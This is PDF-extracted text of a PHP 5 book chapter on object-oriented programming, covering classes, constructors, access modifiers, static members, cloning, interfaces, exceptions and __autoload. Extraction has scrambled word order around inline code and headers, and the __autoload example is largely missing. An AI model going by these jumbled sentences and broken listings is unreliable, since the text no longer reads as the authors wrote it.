83 Gutmans_ch03 Page 55 Thursday, September 23, 2004 2:38 PM CHAPTER 3 PHP 5 OO Language “High thoughts must have a high language.”—Aristophanes 3.1 I NTRODUCTION PHP 3 is the version that introduced support for object-oriented programming (OOP). Although useable, the support was extremely simplistic and not very much improved upon with the release of PHP 4, where backward compatibil- ity was the main concern. Because of popular demand for improved OOP sup- port, the entire object model was completely redesigned for PHP 5, adding a large amount of features and changing the behavior of the base “object” itself. If you are new to PHP, this chapter covers the object-oriented model. Even if you are familiar with PHP 4, you should read it because almost every- thing about OOP has changed with PHP 5. When you finish reading this chapter, you will have learned ☞ The basics of the OO model Object creation and life-time, and how it is controlled ☞ public, protected, and The three main access restriction keywords ( ☞ private) The benefits of using class inheritance ☞ Tips for successful exception handling ☞ BJECTS 3.2 O The main difference in OOP as opposed to functional programming is that the data and code are bundled together into one entity, which is known as an . Object-oriented applications are usually split up into a number of object objects that interact with each other. Each object is usually an entity of the problem, which is self-contained and has a bunch of properties and methods. , which basically means the variables that The properties are the object’s data methods belong to the object. The —if you are coming from a functional back- ground—are basically the functions that the object supports. Going one step further, the functionality that is intended for other objects to be accessed and used during interaction is called an object’s interface . 55

84 Gutmans_ch03 Page 56 Thursday, September 23, 2004 2:38 PM 56 PHP 5 00 Language Chap. 3 is a template for an object and class Figure 3.1 represents a class. A describes what methods and properties an object of this type will have. In this example, the class represents a person. For each person in your application, you can make a separate instance of this class that represents the person’s information. For example, if two people in our application are called Joe and Judy, we would create two separate instances of this class and would call the method of each with their names to initialize the variable holding setName() $name the person’s name, . The methods and members that other interacting objects may use are a class’s contract. In this example, the person’s contracts setName() set and and get- get methods, to the outside world are the two Name() . class Person          Diagram of class Person. Fig. 3.1 The following PHP code defines the class, creates two instances of it, sets the name of each instance appropriately, and prints the names: class Person { private $name; function setName($name) { $this->name = $name; }

85 Gutmans_ch03 Page 57 Thursday, September 23, 2004 2:38 PM new Keyword and Constructors 57 3.4 The function getName() { return $this->name; } }; $judy = new Person(); $judy->setName("Judy"); $joe = new Person(); $joe->setName("Joe"); print $judy->getName() . "\n"; print $joe->getName(). "\n"; C 3.3 D ECLARING LASS A You might have noticed from the previous example that declaring a class (an class keyword, give the class a name, object template) is simple. You use the and list all the methods and properties an instance of this class should have: class MyClass { ... // List of methods ... ... // List of properties ... } $name prop- You may have noticed that, in front of the declaration of the private keyword. We explain this keyword in detail later, but erty, we used the $name it basically means that only methods in this class can access It forces . setName() getName() anyone wanting to get/set this property to use the and methods, which represent the class’s interface for use by other objects or source code. new EYWORD ONSTRUCTORS HE AND K C 3.4 T new keyword. In the previous example, Instances of classes are created using the $judy = new Person(); Person . What class using we created a new instance of the new call is that a new object is allocated with its own copies happens during the of the properties defined in the class you requested, and then the constructor of the object is called in case one was defined. The constructor is a method named __construct() , which is automatically called by the new keyword after creating the object. It is usually used to automatically perform various initializations

86 Gutmans_ch03 Page 58 Thursday, September 23, 2004 2:38 PM PHP 5 00 Language Chap. 3 58 such as property initializations. Constructors can also accept arguments, in statement is written, you also need to send the con- which case, when the new structor the function parameters in between the parentheses. In PHP 4, instead of using as the constructor’s name, you __construct() had to define a method with the classes’ names, like C++. This still works with PHP 5, but you should use the new unified constructor naming convention for new applications. We could have rewritten the previous example to pass the names of the line new : people on the class Person { function __construct($name) { $this->name = $name; } function getName() { return $this->name; } private $name; }; $judy = new Person("Judy") . "\n"; $joe = new Person("Joe") . "\n"; print $judy->getName(); print $joe->getName(); This code has the same result as the previous example. Because a constructor cannot return a value, the most common practice Tip: for raising an error from within the constructor is by throwing an exception. ESTRUCTORS 3.5 D are the opposite of constructors. They are called when Destructor functions the object is being destroyed (for example, when there are no more references to the object). As PHP makes sure all resources are freed at the end of each request, the importance of destructors is limited. However, they can still be useful for performing certain actions, such as flushing a resource or logging information on object destruction. There are two situations where your destructor might be called: during your script’s execution when all references to an object are destroyed, or when the end of the script is reached and PHP

87 Gutmans_ch03 Page 59 Thursday, September 23, 2004 2:38 PM 3.6 Accessing Methods and Properties Using the Variable $this 59 ends the request. The latter situation is delicate because you are relying on some objects that might already have had their destructors called and are not accessible anymore. So, use it with care, and don’t rely on other objects in your destructors. Defining a destructor is as simple as adding a method to __destruct() your class: class MyClass { function __destruct() { print "An object of type MyClass is being destroyed\n"; } } $obj = new MyClass(); $obj = NULL; This script prints An object of type MyClass is being destroyed $obj = NULL; is reached, the only handle to the In this example, when object is destroyed, and therefore the destructor is called, and the object itself is destroyed. Even without the last line, the destructor would be called, but it would be at the end of the request during the execution engine’s shutdown. Tip: The exact point in time of the destructor being called is not guaranteed by PHP, and it might be a few statements after the last reference to the object has been released. Thus, be aware not to write your application in a way where this could hurt you. ETHODS $this ROPERTIES THE CCESSING SING AND 3.6 A P M U V ARIABLE $this is During the execution of an object’s method, a special variable called automatically defined, which denotes a reference to the object itself. By using this variable and the -> notation, the object’s methods and properties can be $name property by using further referenced. For example, you can access the (note that you don’t use a $ before the name of the property). An $this->name object’s methods can be accessed in the same way; for example, from inside one of person’s methods, you could call getName() by writing $this->getName() .

88 Gutmans_ch03 Page 60 Thursday, September 23, 2004 2:38 PM 60 PHP 5 00 Language Chap. 3 public , , and private Properties 3.6.1 protected A key paradigm in OOP is encapsulation and access protection of object prop- erties (also referred to as member variables). Most common OO languages protected , and private , public have three main access restriction keywords: . When defining a class member in the class definition, the developer needs to specify one of these three access modifiers before declaring the mem- ber itself. In case you are familiar with PHP 3 or 4’s object model, all class keyword, which is equivalent to public in var members were defined with the var has been kept for backward compatibility, but it is deprecated, PHP 5. thus, you are encouraged to convert your scripts to the new keywords: class MyClass { public $publicMember = "Public member"; protected $protectedMember = "Protected member"; private $privateMember = "Private member"; function myMethod(){ // ... } } $obj = new MyClass(); This example will be built upon to demonstrate the use of these access modifiers. First, the more boring definitions of each access modifier: . Public members can be accessed both from outside an object by ☞ public and by accessing it from inside the $obj->publicMember myMethod using variable (for example, $this->publicMember method via the special $this ). If another class inherits a public member, the same rules apply, and it can be accessed both from outside the derived class’s objects and from within its methods. ☞ . Protected members can be accessed only from within an protected object’s method—for example, . If another class $this->protectedMember inherits a protected member, the same rules apply, and it can be accessed variable. $this from within the derived object’s methods via the special private . Private members are similar to protected members because they ☞ can be accessed only from within an object’s method. However, they are also inaccessible from a derived object’s methods. Because private prop- erties aren’t visible from inheriting classes, two related classes may declare the same private properties. Each class will see its own private copy, which are unrelated.

89 Gutmans_ch03 Page 61 Thursday, September 23, 2004 2:38 PM 3.6 Accessing Methods and Properties Using the Variable 61 $this public for members you want to be accessible Usually, you would use for members who private from outside the object’s scope (i.e., its methods), and are internal to the object’s logic. Use for members who are internal protected to the object’s logic, but where it might make sense for inheriting classes to override them: class MyDbConnectionClass { public $queryResult; protected $dbHostname = "localhost"; private $connectionHandle; // ... } class MyFooDotComDbConnectionClass extends MyDbConnectionClass { protected $dbHostname = "foo.com"; } This incomplete example shows typical use of each of the three access modifiers. This class manages a database connection including queries made to the database: ☞ The connection handle to the database is held in a member, private because it is used by the class’s internal logic and shouldn’t be accessible to the user of this class. In this example, the database hostname isn’t exposed to the user of the ☞ MyDbConnectionClass class To override it, the developer may inherit from . the initial class and change the value. ☞ The query result itself should be accessible to the developer and has, therefore, been declared as public. Note that access modifiers are designed so that classes (or more specifi- cally, their interfaces to the outer world) always keep an is-a relationship dur- ing inheritance. Therefore, if a parent declares a member as public, the inheriting child must also declare it as public. Otherwise, the child would not have an is-a relationship with the parent, which means that anything you can do with the parent can also be done with the child. public , protected 3.6.2 private Methods , and Access modifiers may also be used in conjunction with object methods, and the rules are the same: ☞ public methods can be called from any scope. ☞ protected methods can only be called from within one of its class methods or from within an inheriting class.

90 Gutmans_ch03 Page 62 Thursday, September 23, 2004 2:38 PM 62 PHP 5 00 Language Chap. 3 private methods can only be called from within one of its class methods ☞ methods private and not from an inheriting class. As with properties, may be redeclared by inheriting classes. Each class will see its own ver- sion of the method: class MyDbConnectionClass { public function connect() { $conn = $this->createDbConnection(); $this->setDbConnection($conn); return $conn; } protected function createDbConnection() { return mysql_connect("localhost"); } private function setDbConnection($conn) { $this->dbConnection = $conn; } private $dbConnection; } class MyFooDotComDbConnectionClass extends MyDbConnectionClass { protected function createDbConnection() { return mysql_connect("foo.com"); } } This skeleton code example could be used for a database connection class. connect() method is meant to be called by outside code. The The createDbCon- method is an internal method but enables you to inherit from the nection() class and change it; thus, it is marked as protected setDbConnection() . The method is completely internal to the class and is therefore marked as private . When no access modifier is given for a method, Note: is used as the public public default. In the remaining chapters, will often not be specified for this reason. 3.6.3 Static Properties As you know by now, classes can declare properties. Each instance of the class (i.e., object) has its own copy of these properties. However, a class can also contain static properties . Unlike regular properties, these belong to the class itself and not to any instance of it. Therefore, they are often called

91 Gutmans_ch03 Page 63 Thursday, September 23, 2004 2:38 PM 3.6 Accessing Methods and Properties Using the Variable 63 $this as opposed to object or instance properties. You can also class properties think of static properties as global variables that sit inside a class but are accessible from anywhere via the class. Static properties are defined by using the keyword : static class MyClass { static $myStaticVariable; static $myInitializedStaticVariable = 0; } To access static properties, you have to qualify the property name with the class it sits in MyClass::$myInitializedStaticVariable++; print MyClass::$myInitializedStaticVariable; This example prints the number 1 . If you’re accessing the member from inside one of the class methods, you self , may also refer to the property by prefixing it with the special class name which is short for the class to which the method belongs: class MyClass { static $myInitializedStaticVariable = 0; function myMethod() { print self::$myInitializedStaticVariable; } } $obj = new MyClass(); $obj->myMethod(); This example prints the number 0 . You are probably asking yourself if this whole static business is really useful. One example of using it is to assign a unique id to all instances of a class: class MyUniqueIdClass { static $idCounter = 0; public $uniqueId; function __construct() { self::$idCounter++; $this->uniqueId = self::$idCounter;

92 Gutmans_ch03 Page 64 Thursday, September 23, 2004 2:38 PM 64 PHP 5 00 Language Chap. 3 } } $obj1 = new MyUniqueIdClass(); print $obj1->uniqueId . "\n"; $obj2 = new MyUniqueIdClass(); print $obj2->uniqueId . "\n"; This prints 1 2 The first object’s $uniqueId 1 and the latter property variable equals . object equals 2 An even better example for using static property is in a singleton pat- tern, which is demonstrated in the next chapter. 3.6.4 Static Methods . What Similar to static properties, PHP supports declaring methods as static this means is that your static methods are part of the class and are not bound $this isn’t accessi- to any specific object instance and its properties. Therefore, ble in these methods, but the class itself is by using to access it. Because self static methods aren’t bound to any specific object, you can call them without class_name::method() syntax. You may creating an object instance by using the , but $this won’t also call them from an object instance using $this->method() self::method() be defined in the called method. For clarity, you should use instead of $this->method() . Here’s an example: class PrettyPrinter { static function printHelloWorld() { print "Hello, World"; self::printNewline(); } static function printNewline() { print "\n"; } } PrettyPrinter::printHelloWorld();

93 Gutmans_ch03 Page 65 Thursday, September 23, 2004 2:38 PM 3.7 Class Constants 65 "Hello, World" followed by a newline. The example prints the string can be printHelloWorld() Although it is a useless example, you can see that called on the class without creating an object instance using the class name, and the static method itself can call another static method of the class print- Newline() using the self:: notation. You may call a parent’s static method by using the parent:: notationn which will be covered later in this chapter. 3.7 C ONSTANTS LASS C Global constants have existed in PHP for a long time. These could be defined using the define() function, which was described in Chapter 2, “PHP 5 Basic Language.” With improved encapsulation support in PHP 5, you can now define constants inside classes. Similar to static members, they belong to the class and not to instances of the class. Class constants are always case-sensi- tive. The declaration syntax is intuitive, and accessing constants is similar to accessing static members: class MyColorEnumClass { const RED = "Red"; const GREEN = "Green"; const BLUE = "Blue"; function printBlue() { print self::BLUE; } } print MyColorEnumClass::RED; $obj = new MyColorEnumClass(); $obj->printBlue(); followed by "Blue" . It demonstrates the ability of This code prints "Red" accessing the constant both from inside a class method with the keyword self and via the class name . "MyColorEnumClass" As their name implies, constants are constant and can be neither changed nor removed after they are defined. Common uses for constants are defining enumerations such as in the previous example or some configuration value such as the database username, which you wouldn’t want the applica- tion to be able to change. Tip: As with global constants, you should write constant names in upper- case letters, because this is a common practice.

94 Gutmans_ch03 Page 66 Thursday, September 23, 2004 2:38 PM 66 PHP 5 00 Language Chap. 3 LONING O 3.8 C BJECTS keyword), the returned value is a han- When creating an object (using the new id number dle to an object or, in other words, the of the object. This is unlike PHP 4, where the value was the object itself. This doesn’t mean that the syn- tax for calling methods or accessing properties has changed, but the copying semantics of objects have changed. Consider the following code: class MyClass { public $var = 1; } $obj1 = new MyClass(); $obj2 = $obj1; $obj2->var = 2; print $obj1->var; is assigned the In PHP 4, this code would have printed 1, because $obj2 , therefore creating a copy, leaving object value of unchanged. $obj1 $obj1 is an object handle (its id number), what is $obj1 However, in PHP 5, because is the handle. So, when changing $obj2 copied to $obj2 , you actually change $obj1 is referencing. Running this code snippet, therefore, the same object 2 results in being printed. Sometimes, though, you really do want to create a copy of the object. How clone . This built- can you achieve that? The solution is the language construct in operator automatically creates a new instance of the object with its own copy of the properties. The property values are copied as is. In addition, you may define a method that is called on the newly created object to __clone() perform any final manipulation. Note: References are copied as references, and don’t perform a deep copy. This means that if one of your properties points at another variable by refer- ence (after it was assigned by reference), after the automatic cloning, the cloned object will point at the same variable. Changing the $obj2 = $obj1; line in the previous example to $obj2 = clone $obj1; $obj2 a handle to a new copy of $obj1 , resulting in 1 will assign being printed out. As previously mentioned, for any of your classes, you may implement a __clone() __clone() method. After the new (cloned) object is created, your $this variable. method is called and the cloned object is accessible using the The following is an example of a typical situation where you might want to implement the __clone() method. Say that you have an object that holds a resource such as a file handle. You may want the new object to not point at the same file handle, but to open a new one itself so that it has its own private copy:

95 Gutmans_ch03 Page 67 Thursday, September 23, 2004 2:38 PM 3.9 Polymorphism 67 class MyFile { function setFileName($file_name) { $this->file_name = $file_name; } function openFileForReading() { $this->file_handle = fopen($this->file_name, "r"); } function __clone() { if ($this->file_handle) { $this->file_handle = fopen($this->file_name, "r"); } } private $file_name; private $file_handle = NULL; } Although this code is only partially written, you can see how you can con- trol the cloning process. In this code snippet, $file_name is copied as is from the original object, but if the original object has an open file handle (which was copied to the cloned object), the new copy of the object will create its own copy of the file handle by opening the file by itself. OLYMORPHISM 3.9 P The subject of polymorphism is probably the most important in OOP. Using classes and inheritance makes it easy to describe a real-life situation as opposed to just a collection of functions and data. They also make it much eas- ier to grow projects by reusing code mainly via inheritance. Also, to write robust and extensible code, you usually want to have as few as possible flow- control statements (such as if() statements). Polymorphism answers all these needs and more. Consider the following code: class Cat { function miau() { print "miau"; } } class Dog { function wuff()

96 Gutmans_ch03 Page 68 Thursday, September 23, 2004 2:38 PM 68 PHP 5 00 Language Chap. 3 { print "wuff"; } } function printTheRightSound($obj) { if ($obj instanceof Cat) { $obj->miau(); } else if ($obj instanceof Dog) { $obj->wuff(); } else { print "Error: Passed wrong kind of object"; } print "\n"; } printTheRightSound(new Cat()); printTheRightSound(new Dog()); The output is miau wuff You can easily see that this example is not extensible. Say that you want to extend it by adding the sounds of three more animals. You would have to else if blocks to printTheRightSound() add another three so you check that the object you have is an instance of one of those new animals, and then you have to add the code to call each sound method. Polymorphism using inheritance solves this problem. It enables you to inherit from a parent class, inheriting all its methods and properties and thus creating an is-a relationship. Taking the previous example, we will create a new class called Animal from which all other animal kinds will inherit, thus creating is-a relationships Dog , to the parent (or ancestor) Animal . from the specific kinds, such as extends keyword: Inheritance is performed by using the class Child extends Parent { ... } This is how you would rewrite the previous example using inheritance: class Animal { function makeSound() {

97 Gutmans_ch03 Page 69 Thursday, September 23, 2004 2:38 PM 3.9 Polymorphism 69 print "Error: This method should be re-implemented in the ➥ children"; } } class Cat extends Animal { function makeSound() { print "miau"; } } class Dog extends Animal { function makeSound() { print "wuff"; } } function printTheRightSound($obj) { if ($obj instanceof Animal) { $obj->makeSound(); } else { print "Error: Passed wrong kind of object"; } print "\n"; } printTheRightSound(new Cat()); printTheRightSound(new Dog()); The output is miau wuff You can see that no matter how many animal types you add to this exam- printTheRightSound() ple, you will not have to make any changes to because Animal check covers all of them, and the instanceof call the $obj->makeSound() will do so, too. This example can still be improved upon. Certain modifiers available to you in PHP can give you more control over the inheritance process. They are covered in detail later in this chapter. For example, the class and its Animal method can be marked as being abstract , which not only means makeSound() that you don’t have to give some meaningless implementation for the make- Sound() definition in the Animal class, but also forcing any inheriting classes to

98 Gutmans_ch03 Page 70 Thursday, September 23, 2004 2:38 PM 70 PHP 5 00 Language Chap. 3 makeSound() implement it. Additionally, we could specify access modifiers to the method, such as the public modifier, meaning that it can be called anywhere in your code. PHP does not support multiple inheritance like C++ does. It supplies Note: a different solution for creating more than one is-a relationship for a given class by using Java-like interfaces, which are covered later in this chapter. parent :: AND self :: 3.10 PHP supports two reserved class names that make it easier when writing OO refers to the current class and it is usually used to access applications. self:: parent:: refers to the parent class and static members, methods, and constants. it is most often used when wanting to call the parent constructor or methods. It may also be used to access members and constants. You should use parent:: as opposed to the parent’s class name because it makes it easier to change your class hierarchy because you are not hard-coding the parent’s class name. The following example makes use of both parent:: and for access- self:: Child and classes: ing the Ancestor class Ancestor { const NAME = "Ancestor"; function __construct() { print "In " . self::NAME . " constructor\n"; } } class Child extends Ancestor { const NAME = "Child"; function __construct() { parent::__construct(); print "In " . self::NAME . " constructor\n"; } } $obj = new Child(); The previous example outputs In Ancestor constructor In Child constructor Make sure you use these two class names whenever possible.

99 Gutmans_ch03 Page 71 Thursday, September 23, 2004 2:38 PM 3.11 Operator 71 instanceof instanceof O 3.11 PERATOR operator was added as syntactic sugar instead of the already The instanceof existing built-in function (which is now deprecated). Unlike the latter, is_a() is used like a logical binary operator: instanceof class Rectangle { public $name = __CLASS__; } class Square extends Rectangle { public $name = __CLASS__; } class Circle { public $name = __CLASS__; } function checkIfRectangle($shape) { if ($shape instanceof Rectangle) { print $shape->name; print " is a rectangle\n"; } } checkIfRectangle(new Square()); checkIfRectangle(new Circle()); 'Square is a rectangle\n' . Note the use of This small program prints __CLASS__ , which is a special constant that resolves to the name of the current class. As previously mentioned, instanceof is an operator and therefore can be used in expressions in conjunction to other operators (for example, the ! [nega- checkIfNotRectangle() tion] operator). This allows you to easily write a function: function checkIfNotRectangle($shape) { if (!($shape instanceof Rectangle)) { print $shape->name; print " is not a rectangle\n"; } } instanceof also checks if an object implements an interface (which is Note: also a classic is-a relationship). Interfaces are covered later in this chapter.

100 Gutmans_ch03 Page 72 Thursday, September 23, 2004 2:38 PM 72 PHP 5 00 Language Chap. 3 BSTRACT ETHODS AND C LASSES 3.12 A M When designing class hierarchies, you might want to partially leave certain meth- ods for inheriting classes to implement. For example, say you have the class hier- archy shown in Figure 3.2. class Shape    class Square class Circle       Fig. 3.2 Class hierarchy. It might make sense to implement setCenter($x, $y) in class Shape and leave the implementation of the methods to the concrete classes Square draw() abstract and Circle . You would have to declare the draw() method as an method so that PHP knows you are intentionally not implementing it in class class, meaning that it’s abstract would then be called an Shape Shape . The class not a class with complete functionality and is only meant to be inherited from. You cannot instantiate an abstract class. You can define any number of meth- ods as abstract , but once at least one method of a class is defined as abstract , the entire class needs to be declared as abstract , too. This double definition exists to give you the option to define a class abstract even if it doesn’t have any abstract methods, and to force you to define a class with abstract methods abstract so that it is clear to others what you had in mind. as The previous class diagram would translate into PHP code that’s similar to the following: abstract class Shape { function setCenter($x, $y) { $this->x = $x; $this->y = $y; } abstract function draw();

101 Gutmans_ch03 Page 73 Thursday, September 23, 2004 2:38 PM 3.13 Interfaces 73 protected $x, $y; } class Square extends Shape { function draw() { // Here goes the code which draws the Square ... } } class Circle extends Shape { function draw() { // Here goes the code which draws the Circle ... } } You can see that the draw() abstract method does not contain any code. Unlike some other languages, you cannot define an method Note: abstract abstract with a default implementation. In PHP, a method is either (without code) or it’s fully defined. 3.13 I NTERFACES Class inheritance enables you to describe a parent-child relationship between classes. For example, you might have a base class from which Shape Square and derive. However, you might often want to add addi- both Circle tional “interfaces” to classes, basically meaning additional contracts to which the class must adhere. This is achieved in C++ by using multiple inheritance and deriving from two classes. PHP chose interfaces as an alternative to mul- tiple inheritance, which allows you to specify additional contracts a class must follow. An interface is declared similar to a class but only includes function prototypes (without implementation) and constants. Any class that “imple- ments” this interface automatically has the interface’s constants defined and, as the implementing class, needs to supply the function definitions for the interface’s function prototypes that are all methods (unless you abstract abstract declare the implementing class as ). To implement an interface, use the following syntax: class A implements B, C, ... { ... }

102 Gutmans_ch03 Page 74 Thursday, September 23, 2004 2:38 PM 74 PHP 5 00 Language Chap. 3 instanceof (is-a) relation- Classes that implement an interface have an implements interface A myInter- ship with the interface; for example, if class printing: face '$obj is-A myInterface' , the following results in $obj = new A(); if ($obj instanceof myInterface) { print '$obj is-A myInterface'; } The following example defines an interface called Loggable , which classes MyLog() func- can implement to define what information will be logged by the tion. Objects of classes that don’t implement this interface and are passed to the MyLog() function result in an error message being printed: interface Loggable { function logString(); } class Person implements Loggable { private $name, $address, $idNumber, $age; function logString() { return "class Person: name = $this->name, ID = $this ➥ >idNumber\n"; } } class Product implements Loggable { private $name, $price, $expiryDate; function logString() { return "class Product: name = $this->name, price = $this ➥ >price\n"; } } function MyLog($obj) { if ($obj instanceof Loggable) { print $obj->logString(); } else { print "Error: Object doesn’t support Loggable interface\n"; } } $person = new Person(); // ... $product = new Product(); MyLog($person); MyLog($product);

103 Gutmans_ch03 Page 75 Thursday, September 23, 2004 2:38 PM 3.15 Methods 75 final Interfaces are always considered to be public Note: ; therefore, you can’t specify access modifiers for the method prototypes in the interface’s declara- tion. Note: You may not implement multiple interfaces that clash with each other (for example, interfaces that define the same constants or methods). OF I NTERFACES 3.14 I NHERITANCE Interfaces may inherit from other interfaces. The syntax is similar to that of classes, but allows multiple inheritance: interface I1 extends I2, I3, ... { ... } Similar to when classes implement interfaces, an interface can only extend other interfaces if they don’t clash with each other (which means that I2 defines methods or constants already defined by I1 ). you receive an error if 3.15 final ETHODS M Until now, you have seen that when you extend a class (or inherit from a class), you may override inherited methods with a new implementation. How- ever, there are times where you might want to make sure that a method can- not be re-implemented in its derived classes. For this purpose, PHP supports the Java-like final access modifier for methods that declares the method as the final version, which can’t be overridden. The following example is not a valid PHP script because it is trying to final method: override a class MyBaseClass { final function idGenerator() { return $this->id++; } protected $id = 0; } class MyConcreteClass extends MyBaseClass { function idGenerator() { return $this->id += 2; } }

104 Gutmans_ch03 Page 76 Thursday, September 23, 2004 2:38 PM 76 PHP 5 00 Language Chap. 3 idGenerator() as in This script won’t work because by defining final , it disallows the deriving classes to override it and change the MyBaseClass behavior of the id generation logic. final C LASSES 3.16 methods, you can also define a class as final Similar to final . Doing so disal- lows inheriting from this class. The following code does not work: final class MyBaseClass { ... } class MyConcreteClass extends MyBaseClass { ... } has been declared as may not extend ; MyConcreteClass final MyBaseClass it and, therefore, execution of the script fails. 3.17 M ETHOD __toString() Consider the following code: class Person { function __construct($name) { $this->name = $name; } private $name; } $obj = new Person("Andi Gutmans"); print $obj; It prints the following: Object id #1 Unlike most other data types, printing the object’s id will usually not be interesting to you. Also, objects often refer to data that should have print semantics—for example, it might make sense that when you print an object of a class representing a person, the person’s information would be printed out.

105 Gutmans_ch03 Page 77 Thursday, September 23, 2004 2:38 PM 3.18 Exception Handling 77 For this purpose, PHP enables you to implement a function called __toString() , which should return the string representation of the object, and command will call it and print the returned string. print when defined, the By using , the previous example can be modified to its more __toString() useful form: class Person { function __construct($name) { $this->name = $name; } function __toString() { return $this->name; } private $name; } $obj = new Person("Andi Gutmans"); print $obj; It prints the following: Andi Gutmans __toString() method is currently only called by the The and echo print language constructs. In the future, they will probably also be called by com- mon string operations, such as string concatenation and explicit casting to string. H ANDLING 3.18 E XCEPTION Exception handling tends to be one of the more problematic aspects in soft- ware development. Not only is it hard for the developer to decide what to do when an error occurs (such as database failure, network failure, or a software bug), but it is hard to spot all the places in the code to insert checks for failure and to call the correct function to handle it. An even more complicated task is that after you handle the failure, how do you fix your program’s flow to con- tinue at a certain point in your program? try/ Today, most modern languages support some variant of the popular catch/throw exception-handling paradigm. try/catch is an enclosing language construct that protects its enclosing source codeand basically tells the lan- guage, “I’m handling exceptions that occur in this code.” Exceptions or errors

106 Gutmans_ch03 Page 78 Thursday, September 23, 2004 2:38 PM 78 PHP 5 00 Language Chap. 3 are “thrown” when they are detected and the language run time searches its call stack to see if there is a relevant try/catch construct that is willing to han- dle the exception. There are many advantages to this method. To begin with, you don’t have if() to place statements in every place where an exception might occur; thus, you end up writing a lot less code. Instead, you can enclose the entire section construct and handle an error if one occurs. Also, after try/catch of code with a throw statement, you can easily return to a you detecte an error using the point in the code that is responsible for handling and continuing execution of throw unwinds the function call-stack until it detects an the program, because appropriate try/catch block. The syntax of try/catch is as follows: try { ... // Code which might throw an exception } catch (FirstExceptionClass $exception) { ... // Code which handles this exception } catch (SecondExceptionClass $exception) { } The try {} construct encloses the code that can throw an exception, which is followed by a series of catch statements, each declaring what excep- tion class it handles and under what variable name the exception should be accessible inside the catch block. catch() is reached and an instance When an exception is thrown, the first comparison with the declared class is performed. If the result is of , the true block is entered and the exception is made available under the declared catch , the next catch statement is checked. Once variable name. If the result is false statement is entered, the following statements will not be catch a catch check would result in instanceof . If no catch state- entered, even if the true try/ ments are relevant, the language engine checks for additional enclosing statements in the same function. When none exist, it continues search- catch ing by unwinding the call stack to the calling functions. statement throw The throw ; can only throw an object. You can’t throw any basic types such as strings or integers. A pre-defined exception class exists called Exception , from which all your exception classes must inherit. Trying to throw an object which does Exception will result in a final runtime error. not inherit from class The following code snippet shows the interface of this built-in exception class (the square brackets in the constructor declaration are used to represent optional parameters, which are not valid PHP syntax):

107 Gutmans_ch03 Page 79 Thursday, September 23, 2004 2:38 PM 3.18 Exception Handling 79 class Exception { function __construct([$message [,$code]]); final public getMessage(); final public getCode(); final public getFile(); final public getLine(); final public getTrace(); final public getTraceAsString(); protected $message; protected $code; protected $file; protected $line; } The following is a full-blown example of exception handling: class NullHandleException extends Exception { function __construct($message) { parent::__construct($message); } } function printObject($obj) { if ($obj == NULL) { throw new NullHandleException("printObject received NULL object"); ➥ } print $obj . "\n"; } class MyName { function __construct($name) { $this->name = $name; } function __toString() { return $this->name; } private $name; } try { printObject(new MyName("Bill")); printObject(NULL); printObject(new MyName("Jane")); } catch (NullHandleException $exception) {

108 Gutmans_ch03 Page 80 Thursday, September 23, 2004 2:38 PM 80 PHP 5 00 Language Chap. 3 print $exception->getMessage(); print " in file " . $exception->getFile(); print " on line " . $exception->getLine() . "\n"; } catch (Exception $exception) { // This won't be reached } Running this script prints Bill printObject received NULL object in file C:\projects\php5\tests\test.php on line 12 Notice that the name Jane isn’t printed, only Bill. This is because the printObject(NULL) line throws an exception inside the function, and therefore, Jane is skipped. In the catch handler, inherited methods such as getFile() are used to give additional information on where the exception occurred. Tip: You might have noticed that the constructor of NullHandleException calls its parent constructor. If NullHandleException ’s constructor is left out, by new default, calls the parent constructor. However, it is good practice to add a constructor and call the parent constructor explicitly so that you don’t forget to do so if you suddenly decide to add a constructor of your own. Today, most internal methods don’t throw exceptions to keep backward compatibility with PHP 4. This somewhat limits its use, but it does allow your own code to use them. Some new extensions in PHP 5—mainly the object-ori- ented ones—do throw exceptions. Make sure you check the extension’s docu- mentation to be sure. Tip: When using exceptions, follow these basic rules (both for performance and code-manageability reasons): 1. Remember that exceptions are exceptions. You should only use them to handle problems, which brings us to the next rule... Never use exceptions for flow control. This makes the code hard to follow 2. goto (similar to the statement found in some languages) and is slow. The exception should only contain the error information and shouldn’t 3. contain parameters (or additional information) that affect flow control and logic inside the catch handler. 3.19 __autoload() When writing object-oriented code, it is often customary to put each class in its own source file. The advantage of this is that it’s much easier to find where a

109 Gutmans_ch03 Page 81 Thursday, September 23, 2004 2:38 PM 3.19 81 __autoload() class is placed, and it also minimizes the amount of code that needs to be included because you only include exactly the classes you need. The downside is that you often have to include tons and tons of source files, which can be a pain, often leading to including too many files and a code-maintenance head- __autoload() solves this problem by not requiring you to include classes ache. you are about to use. If an __autoload() function is defined (only one such func- tion can exist per application) and you access a class that hasn’t been defined, it will be called with the class name as a parameter. This gives you a chance to include the class just in time. If you successfully include the class, your source code continues executing as if the class had been defined. If you don’t success- fully include the class, the scripting engine raises a fatal error about the class not existing. __autoload() : Here’s a typical example using MyClass.php: general.inc: main.php: printHelloWorld(); ?>

110 Gutmans_ch03 Page 82 Thursday, September 23, 2004 2:38 PM 82 PHP 5 00 Language Chap. 3 This example doesn’t omit the PHP open and close tags (like other Note: examples shown in Chapter 2, due to it being spread across more than one file and, thus, not being a code snippet. MyClass.php directory inside the docu- exists in the So long as classes/ ment root of the web server, the script prints Hello, World Realize that was not explicitly included in main.php but MyClass.php . You will usually keep the definition of implicitly by the call to __autoload() __autoload() in a file that is included by all of your main script files (similar to general.inc in this example), and when the amount of classes you use increases, the savings in code and maintenance will be great. Although classes in PHP are case-insensitive, case is preserved Note: when sending the class name to . If you prefer your classes’ file __autoload() names to be case-sensitive, make sure you are consistent in your code, and always use the correct case for your classes. If you prefer not to do so, you can use the function to lowercase the class name before trying strtolower() to include it, and save the classes under lowercased file names. UNCTION LASS H INTS IN F YPE P ARAMETERS 3.20 C T Although PHP is not a strictly typed language in which you would need to declare what type your variables are, it does allow you (if you wish) to specify the class you are expecting in your function’s or method’s parameters. Here’s the code of a typical PHP function, which accepts one function parameter and first checks if it belongs to the class it requires: function onlyWantMyClassObjects($obj) { if (!($obj instanceof MyClass)) { die("Only objects of type MyClass can be sent to this function"); } ... } Writing code that verifies the object’s type in each relevant function can be a lot of work. To save you time, PHP enables you to specify the class of the parameter in front of the parameter itself.

